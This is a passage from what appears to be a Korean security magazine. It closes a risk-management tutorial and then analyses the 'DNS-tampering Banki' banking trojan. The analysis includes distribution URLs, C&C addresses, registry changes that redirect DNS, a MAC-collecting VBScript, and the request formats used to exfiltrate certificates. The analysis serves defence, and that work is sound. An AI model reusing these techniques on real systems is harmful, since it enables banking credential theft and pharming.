을 처리하려면 대개 비용이 소요되기 마련인데, 비용은 한계가 있기
때문에 의사결정이 필요하다. 만약 비용이 무한정이고 시기적으로 급
박한 정도도 동일하다면(시간도 비용이다), 굳이 위험평가를 할 필요
가 없다. 위험 정도를 측정한 뒤 ‘수용할 수 있는 수준’ 이상의 위험에
대해서만 비용을 들여 대응하는 것으로 결정하는데, 이 ‘수용할 수 있
는 수준’을 보안 분야에서는 DoA(Degree of Acceptance)라고 한다.
안전해 대리의 경우, 해당 회사에서 DoA를 11로 정했다면 위험 정도
가 11을 초과하는 경우에만 위험 대응 전략을 고려하고 그 이하의 위
험에 대해서는 감수하거나 잠정적으로 대책을 보류하는 것으로 결정
한다. 인자한 씨는 어떻게 해야 할까? 인자한 씨는 자산가치가 사실
상 평가 불가능하다. 부모가 아니더라도 어린 아이가 교통사고로 인
해 중상을 입거나 생명을 잃었을 때 입을 손실이나 영향을 가늠하는
일은 상당히 어렵다. 결과적으로 인자한 씨는 ‘아이의 교통사고’라는
위험에 대해서 ‘위험감수’라는 선택은 불가능하며 어떤 방법이든 위
험에 대처할 방법을 찾아야만 한다.
5단계: 어떻게 위험에 대응할 것인가 - 위험대응전략
이제 위험관리의 마지막 단계에 이르렀다. 위험에 대응하는 전략은
일반적으로 ▲회피 ▲전가 ▲감소 ▲수용 등 4가지로 분류하곤 한다.
‘회피’란 말 그대로 위험이 발생할 상황 자체를 피하는 것이다. 연인
과 야외로 피크닉을 가기로 했는데 오늘 비가 올 확률이 60%라는 일
기예보를 들었다고 하자. 이 경우 위험은 ‘비가 와서 피크닉을 망치는
것’이고 위협은 ‘비’, 취약점은 ‘야외라 마땅히 비를 피할 곳이 없다’라
는 정도로 볼 수 있다. 이때 취할 수 있는 대응 전략 중 하나는 비 올
가능성이 높은 오늘의 피크닉을 아예 취소하는 것인데, 이런 선택을
‘회피’라고 볼 수 있다.
이 수식에서 곱셈 기호(x)는 위험 수준을 구하기 위해서는 3가지 입력
값을 반드시 곱하라는 뜻이라기보다는 어느 하나의 값이 0이라면 출
력값인 위험 역시 0으로 보아도 된다는 의미로 이해하는 것이 좋겠다.
즉, 아무리 큰 위협이 있다 하더라도 그 위협이 가해질 자산이 없다면
위험이란 의미가 없고, 자산이 있고 위협이 있다 하더라도 취약점이
전혀 없어 위협이 작동할 여지가 없다면 이 또한 위험은 없는 것과
같다는 뜻이다. 실제 위험수준의 계산은 앞에서 구한 3가지 요소들의
측정값을 1~3점이나 1~5점 범위로 구분한 다음, 이를 합산하는 방법
이 주로 쓰인다. 이를 기준으로 안전해 대리와 인자한 씨의 위험평가
결과를 보면 다음과 같다.
취약성 평가 사례 1: 안전해 대리
취약성 영향도 대응 위협
채용시스템 백업 부재 VH(4) 채용시스템 장애
배포된 채용 서류 관리 부실H(3)H(3)
채용 서류 분실
채용과정 법규 위반
주민번호를 수집하는 채용시스템 VH(4) 채용과정 법규 위반
법적준거성 판단 역량 부재 M(2) 채용과정 법규 위반
위험평가 사례 1: 안전해 대리
취약성 취약정도 대응 위협 위협등급 관련자산자산
중요도위험정도
채용시스템
백업 부재4
채용시스템
장애3
입사지원
정보(온라인)3 10
배포된 채용
서류 관리 부실
3채용서류
분실3
입사지원
서류3 9
3 법규위반 4 기업평판 4 11
주민번호를
수집하는
채용시스템
4 법규위반 4 기업평판 4 12
법적준거성
판단 역량 부재2 법규위반 4 기업평판 4 10
위험평가 사례 2: 인자한씨
취약성 취약정도 대응 위협 위협등급 관련자산자산
중요도위험정도
보호자가 없는
2개의 건널목3 교통사고 N/A 아들 N/A 3
방과 후
방치되는
5개의 건널목
4 교통사고 N/A 아들 N/A 4
아이를 챙길
가족 구성원
부재
2 교통사고 N/A 아들 N/A 2
취약성 평가 사례 2: 인자한 씨
취약성 영향도 대응 위협
보호자가 없는 2개의 건널목 H(3) 교통사고
방과 후 방치되는 5개의 건널목 VH(4) 교통사고
아이를 챙길 가족 구성원 부재 M(2) 교통사고
Risk = Asset(Impact) x Threats x Vulnerability
※ 위험정도 = 취약정도 + 위협등급 + 자산중요도
13
‘전가’는 위험으로 인한 손실을 누군가에게 분담시키는 선택이다. 전
가의 대표적인 예는 ‘보험’이다. 가능성 있는 위험이 실제로 발생하면
보험사를 통해 그에 대한 보상을 받음으로써 손실의 규모를 줄이는
것이다.
‘감소’는 위험을 줄이기 위한 대책을 구현하는 것이다. 앞서 예를 든
피크닉 경우라면, 우산을 준비해 가는 것이 위험감소 대책이 될 것이
다. ‘우산’이라는 비용은 들지만 비가 내렸을 때 망쳐버릴 수 있는 피
크닉의 위험을 얼마쯤은 줄여줄 것이기 때문이다.
마지막 선택은 ‘위험 수용’이다. 이는 위험이 발생할 가능성을 그대로
받아들이는 것이다. ‘피크닉 가서 비가 오면 그냥 비를 맞지 뭐. 그것
때문에 여자친구가 화를 낸다면 어쩔 수 없고.’ 대범하거나 미련한 남
자의 선택인 셈이다.
전략 결정에 가장 큰 영향을 미치는 것은 위험평가와 마찬가지로 ‘비
용’이다. 위험으로 인한 ‘손실’이 위험을 억제하는데 드는 비용보다 적
다면, 그 손실은 감수하는 편이 낫다는 것이 기본 논리이다. 역설적이
지만 위험관리의 목적은 위험을 아예 제거하는 것이 아니라 수용할
수 있는 수준까지 낮추는 것이다. (물론, 예외도 있긴 하다.)
이제 안전해 대리와 인자한 씨의 위험대응 전략을 살펴보는 것으로
실습을 마무리하자.
결국 안전해 대리와 인자한 씨 모두 위험을 감소시키는 방향으로 전
략을 결정했다. 사례에서는 취약점이나 위협의 수가 적기 때문에 한
가지 전략을 선택했지만 실제 기업 운영이나 아이를 키우면서 직면하
게 되는 위험은 매우 다양할 수 있다. 그에 따른 전략과 대책 또한 다
양하게 도출될 수 있을 것이다.
변화하는 위협, 지속적인 위험관리 필요
끝으로 인자한 씨를 사례로 든 이유 또는 변명을 다시금 하고자 한다.
기업 보안 담당자라면 불필요한 사례라고 느꼈을 듯도 싶다. 그럼에
도 불구하고 굳이 아이를 안전하게 지키고 싶은 아버지를 사례로 언
급한 이유는 위험관리에서 가장 중요한 출발점은 자신이 지키고자 하
는 대상에 대한 애정과 관심이라고 생각하기 때문이다. 아이들은 시
시각각 성장하고 변한다. 기업의 자산도 처음 상태 그대로 있는 것이
아니다. 서버 시스템이라면 초기의 가용성과 5년 뒤, 10년 뒤의 가용
성이 같은 상태일 수 없다. 위협 또한 고정적이지 않다. 초등학교 1학
년 때는 길을 건너는 일조차 위험일 수 있지만 대학생이 된다면 그때
는 또 다른 위험에 대해 고려해야만 한다. 기업 자산에 대한 위협 역
시 늘 다양한 유형으로 바뀌고 늘어난다.
따라서 위험관리란 1회성으로 끝낼 일이 결코 아니다. 자산과 위협과
취약점의 변화를 지속적으로 주시하고 종합적인 위험을 수시로 가늠
하면서 소중한 대상이 안전하게 유지될 수 있도록 돌보는 영속적인
과정이다. 만약 인자한 씨가 아들 걱정 하듯 기업의 직원들이 자신에
게 소중한 자산이 무엇인지 인식하고 지키고자 한다면 위험관리 방법
론이 무엇이든 중요치 않다고 본다. 내게 전문 지식이 없다면 아이가
아플 때 병원 가서 진료 받듯이 전문가의 도움을 받으면 된다. 중요한
것은 어떤 상황에서도 내 자산은 내가 돌보겠다는 책임감과 의지가
보안의 핵심이라는 것이다. 손발이 오그라들 수 있는 멘트로 글을 맺
는다. 보안은 사랑이다. 사랑하면 지키게 된다.
위험전략 사례 1: 안전해 대리
1. Doa를 초과하는 위험
취약성 취약정도 대응 위협 위협등급 관련자산자산
중요도위험정도
주민번호를
수집하는
채용시스템
4 법규위반 4 기업평판 4 12
위험전략 사례 2: 인자한 씨
1. Doa를 초과하는 위험
취약성 취약정도 대응 위협 위협등급 관련자산자산
중요도위험정도
보호자가 없는
2개의 건널목3 교통사고 N/A 아들 N/A 3
방과 후
방치되는
5개의 건널목
4 교통사고 N/A 아들 N/A 4
2. 대응전략
대응전략 상세 방안 고려사항 및 비용 결정안
회피 채용시스템 사용 중지서류 수만으로 채용 시
경쟁력 떨어짐
전가민사소송에 대비한
손해배상 보험 가입
형사처벌의 위험은 피할 수 없음
보험 비용이 과다함
감소 채용시스템 수정 약 2개월 소요, OOO원 비용 발생 ●
수용 기존 시스템 운영적발 시 민형사상 책임 수위가
매우 높음
2. 대응전략
대응전략 상세 방안 고려사항 및 비용 결정안
회피길을 건너지 않는
학교로 전학을 간다.
집을 옮겨야 할 수도 있다.
거리가 멀어짐으로 인해 또 다른
위험이 발생할 수도 있다.
전가교통사고에 대비해
보험을 든다.
상해로 인한 치료에는 도움이 되겠지
만 궁극적인 사고를 막을 수는 없다.
감소
1. 아이가 학교에 입
학하면 등굣길에는 관
리가 되는 3개 건널목
만을 이용하도록 2주
간 교육을 한다.
2. 방과 후에는 시간
제 도우미를 고용해서
아이를 데려온다.
1. 2주간 출근 지연 처리
2. 시간제 도우미 고용
(일일 2시간 5만원)
●
수용 고려하지 않음 고려하지 않음
1414
인터넷 뱅킹 정보 탈취 악성코드 ‘DNS 변조형 뱅키’ 분석 보고서
T h R E aT a N a Ly S i S
가짜를 진짜로 둔갑시킨 악성코드,
실체는 ‘파밍’
DNS 변조형 뱅키
최근에는 치밀한 계획 하에 특정 기업이나 정부기관의 정보망에 침투하여 비밀 정보를 유출하는 공격이 증가하고 있다. 그러나 여전히
불특정 다수의 대중을 대상으로 하는 공격을 선호하는 해커들도 존재한다. 이러한 공격 중 하나로 인터넷 뱅킹 사용자를 대상으로 계
좌 이체에 필요한 정보를 탈취하여 금전적인 이득을 취하는 악성코드 계열(Banki 또는 Banker)이 자주 사용된다. 이 글에서는 인터넷
뱅킹 정보 탈취 악성코드 중에서도 최근 자주 유포되고 있는 특정 유형의 악성코드인 DNS 변조형 뱅키에 대한 분석 내용을 소개하고
자 한다.
유포 방식
인터넷 뱅킹 정보 탈취 악성코드가 국내에 처음 모습을 드러낸 이후
로, 이러한 공격 방법에 대응하기 위해 제도적•기술적으로 많은 시도
를 하고 있다. 그러나 해커들도 기술의 정교함과 속임수 측면에서 점
점 더 진화하는 모습을 보이고 있다. 사람들의 재산과 직결된 인터넷
뱅킹의 특성 상 피해자들의 타격이 크기 때문에 보안업체는 관련 악
성코드에 대한 모니터링과 대응을 중요하게 생각하고 있다. 공격자들
도 이러한 점을 파고들어 매우 짧은 시간 내에 악성코드를 집중적으
로 유포하고, 일정 시간 동안만 서버로의 접속을 열어두는 방법을 사
용하고 있다. 과거에는 유포 시점이 주로 주말에 집중되었으나, 최근
에는 주중에도 활발하게 유포된다. 공격자들은 단시간 동안 감염 시
스템 수를 늘리기 위해 다양한 방법을 사용하는데, 다음과 같은 방법
들이 존재한다.
■ 다른 프로그램에 포함시킨 채 유포: 웹하드 프로그램 또는 기
타 불필요한 프로그램(Potentially Unwanted Program, 이하
PUP) 범주에 포함될 수 있는 프로그램 내에 인터넷 뱅킹 정보 탈
취 악성코드를 숨기는 방식을 이용한다. 즉 원래의 프로그램은 정
상적으로 실행시킨 후 악성코드는 백그라운드에서 동작하여 사용
자의 공인인증서를 탈취하고, 보안카드 번호 등의 정보를 입력하
도록 유도하는 홈페이지로 자동으로 이동하도록 시스템을 조작
한다. 대부분 다운 받은 프로그램 내에 악성코드가 함께 포함되어
있었으며 사용자는 시스템이 조작되었다는 사실을 인지하지 못하
게 된다. 따라서 자신이 접속하는 은행 또는 포털 사이트가 정상
사이트라고 착각하고 주요 정보를 입력하게 될 우려가 있다.
■ 취약한 웹 사이트 변조를 통한 유포: 다수의 사람들이 방문하
면서도 보안이 취약한 웹사이트를 파악하여, 일부 웹 페이지를 변
조하고 공격자가 제작한 악성코드가 유포될 수 있도록 하는 방법
이다. 이때 자바(JAVA) 취약점 등을 함께 악용하는 경우가 많다.
본래는 정상적으로 사용되고 있는 웹사이트에 접속하고 있기 때문
에, 대다수 사용자는 자신이 방문 중인 사이트에서 악성코드를 유
포하고 있다는 사실을 자각하지 못한 채 시스템이 감염될 수 있다.
[그림 1] 다른 정상 프로그램에 포함된 채 유포되는 악성코드
[그림 2] 취약한 웹 사이트 변조를 통해 유포되는 악성코드
15
DNS 변조형 뱅키는 위에서 언급한 두 가지 방법을 모두 사용하여 유
포된 이력이 존재하며, 유포 시 주로 확인되는 파일 이름으로는 inst.
exe, bbs.exe, sb.exe, ss.exe 등이 있다. 그 중 취약한 웹 사이트 변
조를 통해 유포된 이력에는 국내 유명 항공사 홈페이지도 포함되어
있어 상당히 많은 사용자의 감염이 우려된다.
유포 현황
DNS 변조형 뱅키 악성코드 유포 이력이 있는 도메인과 하위 주소 및
각 유포 경로가 활용된 시점에 대한 일부 목록을 공개하면 다음과 같다.
C&C 서버 현황
사용자 시스템이 DNS 변조형 뱅키에 의해 감염되면, QQ 페이지, 중간
경유지, 최종 C&C 등 서로 다른 3곳의 주소로 네트워크 접속을 시도한다.
■ QQ 페이지: 감염에 성공하면 가장 먼저 접속을 시도하는 주
소로, 중국의 유명 포털 사이트인 QQ에서 제공하는 블로그 서
비스에서 제공하는 페이지로 접속한다. 해당 페이지로 접속하
는 주소는 http://r.qzone.qq.com/cgi-bin/user/cgi_personal_
card?uin=[가변ID]?=[랜덤숫자] 형식으로 이루어져 있으며, 접속
에 성공하면 최종 C&C 주소를 획득할 수 있다.
■ 중간 경유지: 감염된 시스템의 MAC 주소를 수집하여 전송하
는 주소로, 공격자 입장에서 감염 현황을 파악하는 용도로 사용하
는 것으로 추정된다. IP 주소로 바로 접속을 시도하는 경우도 있
으나, 도메인 이름을 사용하여 접속을 시도하는 경우도 존재한다.
■ 최종 C&C: 감염이 완료된 상태에서 사용자의 시스템에서 수
집한 공인인증서를 전송하고, 파밍 기능을 수행하는데 사용되는
공격자의 서버이다.
비슷한 시간대에 유포된 변종 혹은 비슷한 유포지로부터 유포된 변종
사이에는 접속에 사용되는 3곳의 주소가 비슷한 경우도 존재하나, 유
포 경로와 마찬가지로 대부분 유지되는 주기가 짧은 편이다.
[그림 4]는 DNS 변조형 뱅키에 감염될 경우 가장 먼저 접속을 시도하
는 QQ 페이지에 대한 접속 빈도 수와 각 페이지에 대한 접속이 지속
된 날짜를 보여주고 있다. 가로 축은 접속에 사용된 QQ 페이지에 접근
하는데 사용된 ID 값이다. 대부분 수일 이내에 기존 페이지를 폐기하고
새로운 페이지를 개설하는 추세이나, 한 페이지가 40일 이상 지속된
경우도 존재한다.
위 목록은 2014년 12월경부터의 유포 경로를 보여주고 있다. 그러나
DNS 변조형 뱅키가 최초 발견된 시점은 2014년 10월경으로 거슬러
올라가며, 그 이후에도 꾸준히 변종들이 발견되고 있다. 각각의 유포
경로는 수 시간 내에 유포를 마치고 사라지는 경우도 있으나, 길게는
열흘 가량 유포를 지속한 경우도 존재한다. 각 유포 경로에서 유포에
성공하는 건수도 수십 건부터 수천 건까지 목격되고 있어, 다수의 사
용자가 쉽게 감염 환경에 노출되어 있다는 것을 파악할 수 있다.
지난 1월 약 2주간 DNS 변조형 뱅키의 유포에 사용된 고유한 유포
경로에 대하여 일자별 유포 추이는 [그림 3]과 같다. 주말과 주중을
가리지 않고 골고루 새로운 유포 경로가 발견되고 있으며, 유포가 이
루어지는 시각도 늦은 밤 또는 새벽에서부터 이른 오전이나 오후 시
간대까지 다양한 시간대에 활동하고 있음을 알 수 있다.
두 번째로 접속을 시도하는 중간 경유지의 경우 QQ 페이지 또는 최
종 C&C에 비해 대체로 지속 시간이 긴 특징을 보이고 있는 것을 [그
림 5]에서 알 수 있는데, 지속되는 시간이 길수록 접속되는 빈도수 또
한 높은 것을 확인할 수 있다. 중간 경유지 중 가장 오랜 시간 지속된
도메인 하위 주소 최초 유포 시점
dk**.kr /web/bbs_sun/files/mov/s.exe 2015-01-25
ha***.co.kr
/bb.exe 2015-01-23
/ee.exe 2015-01-25
/gh.exe 2015-01-26
/jk.exe 2015-01-26
/kl.exe 2015-01-27
/ma.exe 2015-01-23
/sb.exe 2015-01-24
/ww.exe 2015-01-25
hm**.co.kr /acc_img/mmc.exe 2014-12-02
i-t***.co.kr /xe/files/loa.exe 2015-01-17
ma***d.***.ac.kr /files/s.exe 2015-01-25
myplane.******.com/sb.exe 2015-01-22
/ss.exe 2015-01-22
photo.******.com/bbs.exe 2015-01-20
/ss.exe 2015-01-21
script.******.co.kr /bbs.exe 2015-01-14
www.blue*******.co.kr /ss.exe 2015-01-22
www.han****.kr
/bbs.exe 2015-01-17
/jk.exe 2015-01-19
/ok.exe 2015-01-26
/sb.exe 2014-12-31
www.h***esu.net /sb.exe 2015-01-18
www.mount*****.co.kr
/bbs.exe 2015-01-14
/cao.exe 2015-01-15
/gg.exe 2015-01-13
/ok.exe 2015-01-26
/sb.exe 2015-01-16
www.oph****.co.kr /admin/img/sms.exe 2015-01-23
www.sen*****est.co.kr /bbs.exe 2015-01-18
[표 1] DNS 변조형 뱅키 유포 이력
[그림 3] 최근 2주간의 DNS 변조형 뱅키 유포 추이
[그림 4] DNS 변조형 뱅키의 QQ 페이지 접속 현황
16
두 주소의 경우, 하나는 특정 도메인을 사용하고 있으며 (tongji11.
gnway.cc) 다른 하나는 IP 주소가 직접 접속에 사용되고 있었다.
•2번-2번-9번-15번 (ha***.co.kr / uid=2932952979 / 59.13.21
1.147 / 67.229.x.x 대역)
•11번-5번-8번-9번 (www.mount*****.co.kr / uid=177209901
5 / 49.143.199.74 / 174.139.101.19)
•(불명)-9번-4번-10번 (불명 / uid=2630266461 / 14.33.65.216
/ 180.178.38.x 대역)
•(불명)-12번-4번-11번 (불명 / uid=3152307151/ 14.33.65.216
/ 180.178.4x.x 대역)
사용자의 공인인증서가 전송되고, 사용자의 인터넷 뱅킹 정보를 획득
하는 최종 C&C의 경우에는 QQ 페이지나 중간 경유지와는 다른 특징
을 보인다. 각각의 최종 C&C 주소는 매우 짧은 기간 유지되기도 하지
만, 매우 장기간 유지되는 경우도 있다(1일 이내 또는 40일 이상). 중
간 경유지의 IP 주소 대역은 대체로 일관성을 찾기 어려웠으나, 최종
C&C 주소의 경우 비슷한 대역의 IP가 다수 목격되며 이로 인해 동일
공격자가 한번에 다수의 서버를 공격에 활용하는 것을 추론할 수 있
다. 또한 중간 경유지에 비해 확연히 많은 수의 C&C 서버가 존재하
며, 각각의 C&C 서버에 접속이 이루어지는 경우는 평균 2건 정도로
매우 적은 편이다. 앞서 살펴본 다른 두 종류의 공격자 주소는 해당
주소가 지속된 기간이 길다면 그에 비례하여 접속 건수도 증가하는
양상을 보였으나, 최종 C&C 서버의 경우에는 지속 기간이 매우 긴 경
우에도 대체로 적은 수의 접속이 이루어졌다. 최종 C&C 주소와 접속
되는 현황은 [그림 6]에서 확인할 수 있다.
감염 행위 개요
DNS 변조형 뱅키 악성코드는 현재 시점에도 다양한 경로를 통해 유포
되며, 공격자의 서버도 계속해서 새롭게 개설되고 있다. 이로 인해 새로
운 감염자가 지속적으로 발생하고 있다. 사용자 컴퓨터가 해당 악성코
드에 감염이 되면 다음 3가지로 분류된 감염 행위를 확인할 수 있다.
•시스템 변조: 시스템 자동 실행 목록에 악성코드 등록, 방화벽
설정 변경, DNS 설정 변경, 시작페이지 변경 등, 공격 과정 중 사
용자 시스템에 다양한 변경을 수행한다.
•사용자 정보 획득 및 유출: 사용자 시스템의 MAC 주소, 인터넷
뱅킹에 사용되는 공인인증서 등을 획득하여 공격자의 서버로 전
송한다.
•파밍(Pharming)을 통한 정보 입력 요구: 앞서 이루어진 다양
한 시스템 설정 변조는 결국 DNS 변조형 뱅키의 최종 기능인 파
밍을 수행하기 위한 준비 과정이다. 모든 감염이 성공적으로 이루
어지면 사용자가 포털 사이트 혹은 은행 사이트로 접속을 시도하
면, 공격자에 의해 정교하게 조작된 가짜 페이지로 연결되며 사용
자의 개인 정보 및 보안카드 번호 등을 입력하도록 요구한다.
유포지 및 C&C 서버 연관 관계
DNS 변조형 뱅키 악성코드의 유포지에서부터 최종 C&C까지의 연관
관계를 살펴본 결과, 비슷한 공격자 그룹에 의한 유포 정황을 추론해
볼 수 있었다. [그림 7]에는 각각 유포지, QQ 페이지, 중간 경유지, 최
종 C&C사이의 연결 관계가 나타나 있는데, 각 노드가 연결되는 색이
굵고 붉은 색에 가까울수록 다수의 연결을 의미하며, 가늘고 옅은 색
일 경우 가벼운 연결 관계를 의미한다. 각각의 노드는 하나의 고유한
유포지(도메인 기준) 또는 C&C 주소를 의미하는데, 최종 C&C의 10,
11, 15번 노드는 비슷한 IP 대역을 하나의 노드로 표시한 것이다. 유
포-감염 간에 가장 명확한 연결 관계가 나타나는 경로는 다음 4가지
경로가 파악되었다(각각 유포지-QQ 페이지-중간 경유지-최종 C&C 순).
[그림 5] DNS 변조형 뱅키의 중간 경유지 접속 현황
[그림 6] DNS 변조형 뱅키의 최종 C&C 접속 현황
[그림 7] DNS 변조형 뱅키의 유포지와 C&C 주소 간의 연결 관계
[그림 8] DNS 변조형 뱅키의 악성 행위
17
상세 행위 및 특징
DNS 변조형 뱅키의 각 감염 행위의 발생 순서에 따른 상세 내역 및
특징은 다음과 같다.
1. 시스템 자동 실행 등록 및 뮤텍스(MUTEX) 생성
레지스트리에 스스로를 등록하여 시스템이 실행될 때 마다 자동으로
실행될 수 있도록 한다.
또한 앞서 레지스트리에 자동 실행 등록 시 사용한 이름과 동일한,
****** 이라는 이름의 뮤텍스(MUTEX)를 생성한다. 악성코드마다 특
이한 이름의 뮤텍스를 생성하는 경우가 있는데, 악성코드가 중복 감염
여부를 체크하기 위한 목적으로 사용되기도 하는 방법이다.
•기본 설정 DNS 서버: 127.0.0.1(localhost)로 설정하며, DNS
변조형 뱅키 자체가 DNS 서버 역할을 수행할 수 있게 된다. 사용
자 PC에서 발생하는 모든 DNS 검색 요청은 우선적으로 DNS 변
조형 뱅키를 거치게 되며, 그 중 DNS 변조형 뱅키에서 대상으로
하는 포털 사이트 및 은행 사이트에 대한 요청에 대해서는 공격자
의 IP 주소를 응답으로 전달하여 공격자 서버로 접속되도록 한다.
또한 DNS 변조형 뱅키의 대상이 아닌 사이트에 대한 DNS 검색
요청은 보조 DNS 서버로 전달될 수 있도록 한다.
•보조 DNS 서버: 8.8.8.8로 설정하며, 이는 구글(Google)에서
정상적으로 제공하고 있는 DNS 서버의 주소이다. 보조 DNS 서버
는 말 그대로 보조적인 역할로, 기본 설정 DNS 서버가 응답할 수
없을 경우 2차로 접근하게 되는 DNS 서버이다. 대부분은 기본 설
정 DNS 서버에서 응답을 처리해줄 수 있기 때문에 일반적으로는
보조 DNS 서버를 설정해주지 않아도 되지만, DNS 변조형 뱅키가
보조 DNS 서버 주소를 설정해주는 이유는 사용자를 속이기 위한
목적이 크다. 만약 기본 설정 DNS 서버로 로컬호스트만 설정되
고 보조 DNS 서버가 설정되어 있지 않은 경우, 사용자가 입력하
는 DNS 검색 요청 중 DNS 변조형 뱅키의 공격 대상 사이트에 대
한 요청은 공격자의 IP 주소로 응답하게 된다. 반면 공격 대상 사
이트가 아닌 경우에는 정상 사이트로 접속하는 IP를 전달해줄 수
없어 인터넷 연결에 실패하게 되고, 사용자가 이 점을 의심스럽게
생각할 수 있다. 따라서 보조 DNS 서버를 설정해주면, 공격 대상
사이트는 DNS 변조형 뱅키에 의해 응답되는 공격자의 IP를 제공
해줄 수 있고, 공격 대상이 아닌 사이트에 대해서는 실제 구글의
정상 DNS인 8.8.8.8 로 DNS 요청이 전달될 수 있으며, 사용자에
게 이상 징후를 보이지 않은 채 악성 기능도 수행이 가능해진다.
2. 방화벽 설정 변경
악성코드가 외부와 자유롭게 통신할 수 있도록 시스템에 원래 적용되
고 있던 방화벽 정책에 악성코드 자신을 허용 가능한 예외 프로그램
으로 등록한다.
3. DNS 설정 변경
DNS 변조형 뱅키의 특징은 자기 자신이 DNS 서버 역할을 수행하는
것이다. DNS(Domain Name System)란 기억하기 어려운 IP 주소 대
신 기억하기 쉬운 도메인 이름을 서로 연결해주기 위해 필요한 것이
다. 예를 들어 사용자가 www.ahnlab.com이라는 도메인 이름을 입
력하면 실제 서버의 IP인 211.***.**.** 으로 연결해주는 기능을 한다.
DNS 변조형 뱅키를 비롯하여 파밍 기능을 수행하는 악성코드는 사용
자가 입력하는 도메인 이름에 대한 IP 주소를 정상 DNS 서버로부터
받아오는 것이 아니라, 그 내용을 중간에 가로채서 공격자가 원하는
IP 주소를 대신 전달하는 방식으로 인터넷 연결 과정을 조작한다. 기
존에는 시스템의 호스트 파일을 변조하는 등의 방법으로 이러한 기능
을 수행했다. 그러나 보안 업체들도 이에 대한 대응책을 마련하고 있
기 때문에 DNS 변조형 뱅키는 호스트 파일을 변조하는 것이 아닌, 자
기 자신이 DNS 서버로서 동작하는 방법을 사용하고 있다. 스스로를
DNS 서버로 설정하기 위해, UDP 53번 포트(DNS 서비스 전용 포트)
를 사용해 수신을 기다리며 다음과 같은 값을 레지스트리에 등록한다.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run:******
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\
FirewallPolicy\StandardProfile\AuthorizedApplications\List:[악성코드 실행
경로]=[악성코드 실행 경로]:*:Enabled:Sevsl
HKLM\SYSTEM\CurrentControlSet\Ser vices\Tcpip\Parameters\
Interfaces\{C73E7C88-7F6F-40A0-A2B7-9C53EC4C9528}:NameServ
er=127.0.0.1,8.8.8.8
HKLM\SYSTEM\CurrentControlSet\Ser vices\Tcpip\Parameters\
Interfaces\{642EF71F-C550-4186-984C-67EA3AC4A4CB}:NameServ
er=127.0.0.1,8.8.8.8
[그림 9] DNS 변조형 뱅키에 의해 생성된 뮤텍스
[그림 10] DNS 변조형 뱅키에 의해 변경된 DNS 설정
[그림 11] 정상적인 DNS 서버와의 동작 방식
******
18
[그림 12] DNS 변조형 뱅키에 의해 대체된 DNS 서버와의 동작 방식
[그림 14] DNS 변조형 뱅키에 의해 압축된 NPKI 폴더 내부 파일
[그림 15] 획득한 공인인증서 전송 시의 패킷 덤프
[그림 13] QQ 페이지 접속 시 표시 내용
4. QQ 페이지 접속
첫 번째 네트워크 접속은 최종 C&C 주소를 획득하기 위해 QQ 페이
지에 접근하는 것이다. QQ 페이지 접속 시 사용되는 주소는 다음과
같이 구성된다.
6. 공인인증서 획득
DNS 변조형 뱅키는 사용자 시스템에 저장되어 있는 공인인증서를
탈취하기 위해, 공인인증서가 저장될 때 사용되는 NPKI라는 문자열
을 포함한 경로들을 순회하며 해당 폴더 내에 저장된 파일들을 획득
한다. 해당 경로 내에 존재하는 파일들은 모두 하나의 .zip 파일로 압
축되고, 사용자 시스템의 임시 폴더에 일정한 이름으로 생성된다.
7. 최종 C&C 접속 및 공인인증서 전송
앞서 QQ 페이지로부터 획득한 최종 C&C 주소로는 다음 두 가지 요
청이 전송된다.
첫 번째 요청 시 인자로 전달되는 숫자는 동일 시스템에서도 매번 다
른 숫자가 생성되지만, 서버로부터 전송되는 응답은 C&C 서버 주소
가 달라지더라도 5b60ebdab508b264fe58cf7f4a679de2로 동일함
을 확인하였다. 두 번째 요청으로는 앞서 획득한 사용자 공인인증서에
대한 압축 파일을 전송하는 과정으로, 다음과 같은 형태로 전송된다.
8. 시작페이지 변경 및 파밍 수행
지금까지의 과정이 성공적으로 이루어지면 마지막 단계로 사용자 시
스템에서 인터넷 익스플로러(Internet Explorer)의 시작 페이지를 위
조된 포털 사이트로 변경한다. DNS 변조형 뱅키는 스스로 DNS 서버
역할을 수행하며 위조된 포털 사이트 도메인 이름에 대해 공격자의
서버 주소로 응답하기 때문에 실제로는 공격자의 서버(최종 C&C주
소)로 접속이 이루어진 것이다.
공격자 서버로부터 전송되는 이 가짜 포털 사이트 페이지는 시간에
따라 혹은 공격자에 따라 변화하는 것으로 보인다. [그림 16]에서 보
QQ 페이지는 새로운 ID를 가진 페이지가 계속 생성되고 있기도 하
며, 동일 ID의 페이지가 다수의 샘플에 의해 접근되기도 한다. 접속에
성공하면 다음과 같은 내용을 확인할 수 있으며, 이 중 “nickname”
영역에 명시된 IP 주소가 공격자가 사용하고자 하는 최종 C&C 주소
이다.
5. 중간 경유지 접속
사용자 시스템의 MAC 주소를 수집하며, 이를 다음과 같은 형식으
로 중간 경유지 주소로 요청한다. 중간 경유지 주소는 악성코드 내에
Base64 형식으로 인코딩된 상태로 존재하며, 공격자가 악성코드를
생성하는 시점에 이미 중간 경유지로 사용할 주소는 결정된 상태로
배포됨을 파악할 수 있다.
또한 MAC 주소 수집을 위해서는 다음과 같은 스크립트를 사용하고
있으며 역시 Base64로 인코딩된 형태로 악성코드 내부에 포함되어
있다.
http://r.qzone.qq.com/cgi-bin/user/cgi_personal_card?uin=[숫자
(ID)]?=[가변 숫자]
[중간 경유지 주소]/Count.asp?ver=001&mac=[MAC 주소]
Function MACAddress()
Dim mc,mo
S e t m c = G e t O b j e c t ( " W i n m g m t s : " ) . I n s t a n c e s O f ( " W i n 3 2 _
NetworkAdapterConfiguration")
For Each mo In mc
If mo.IPEnabled=True Then
MACAddress= mo.MacAddress
Exit For
End If
Next
End Function
C : \ d o c u m e n t s a n d s e t t i n g s \ [사용자명] \ l o c a l s e t t i n g s \ t e m p \
f91d6992fc2a47e9f9cb3ef9d27bf73f.zip
GET /ip.php?=[랜덤숫자]
POST /upload.php
19
이듯 9개 은행만을 대상으로 하는 페이지도 발견 되었으며, 다른 변종
샘플에서는 전부 12개 은행을 대상으로 하는 페이지도 관찰되었다.
맺음말
인터넷 뱅킹 정보 탈취 악성코드가 발견되기 시작한 것은 이미 수 년
전이지만, 보안 업체들의 이러한 악성코드를 방어하려는 노력에 발맞
추어 공격자들의 공격 방법도 점차 새로운 기법이 나타나고 있다. 과
거에 가장 흔하게 나타났던 유형이 호스트 파일(혹은 host.ics 파일)
을 변조하는 것이라면, 메모리를 변조하는 형태도 발견되었으며 공유
